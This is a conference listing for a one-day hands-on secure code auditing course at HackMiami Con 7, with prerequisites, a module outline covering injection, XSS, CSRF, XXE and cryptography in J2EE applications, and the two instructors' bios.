HackMiami Con 7


Secure Code Auditing

By Manoj Kumar and Ranjith Menon

Register Now!

Secure code auditing is a highly effective process of identifying vulnerabilities in software. This
process requires a more in-depth analysis of an application in order to find the security flaws.
This comprehensive training will be hands on how to perform secure code auditing,
so you will need to bring your own laptop to perform different types of attacks on web based applications.

Windows/Linux/OsX Installed machine
Free space in your machine – 10GB
Installed VMware Player in your machine

Those who want to perform a manual secure code audit.
Those who have very basic knowledge in OWASP Top 10.
Those who want to build secure applications.
Those having basic development background.
Those who want to learn various source code review methodologies and approaches.

Exposure to different tools used for performing attacks
J2EE based demo application to perform secure code audit

Any professional tools

Course Duration: 1 Day
The course covers relevant J2EE based web application issues to subsequently demonstrate how to
design and develop code defenses into an application.


Module 1: Secure Source Code Review(SSCR) Approaches
➢ What is SSCR
➢ Need for SSCR
➢ Different way of doing SSCR
➢ SSCR vs Dynamic application security testing
Module 2: Input Validation
➢ Bypassing client-side validation➢ Variable manipulation attacks
➢ Insecure Direct Object References
➢ File Upload attacks and best practices
➢ Reflected, Stored and DOM based XSS
➢ Proper implementation of OTP & CAPTCHA
➢ Best practices and guidelines to avoid these Attacks
➢ Demo
Module 3: Injection
➢ Blind & Second Order SQL injection
➢ CSV based export features using formula injection
➢ Demo
Module 4: Error Handling and Logging
➢ Proper implementation of log
➢ Proper error handling
➢ Demo
Module 5: Code Quality
➢ Language specific configuration check
➢ Hard coded information
➢ Critical information in comment
➢ Client side hardcoded information
➢ Best practices to cheak unused code
➢ Demo
Module 6: Cryptography
➢ Encryption & Decryption
➢ Encoding & Decoding
➢ Hashing
➢ Salted hash technique
➢ Storage of critical information in backend side
➢ Demo
Module 7: XML External Entity (XXE) Attack
Module 8: Cross Site Request Forgery (CSRF)

Register Now!

About Manoj Kumar and Ranjith Menon

Manoj Kumar has more than 6 years of experience in the field of Application Security and Secure coding process and a co-founder of h1hakz. He has Developed many Secure Application Projects using different languages and has Code reviewed a wide range ofapplications, from embedded systems to web applications including Retail Banking and E-commerce Application.

Handle: @cysmanojsah, @h1hakz

Register Now!

Ranjith Menon who has more than 8 years of experience. He is an active player on Bug bounty programs and specialized in Web application, Mobile, Cloud and a contributor to the Security Community and co-founder of h1hakz, an open platform for knowledge sharing through webcast series. Also, he has found many vulnerabilities for many organizations. Apart from hacking, he gets time for fitness from his work schedule.

Handle: @ranjith_menon16, @h1hakz

Register Now!

For more information: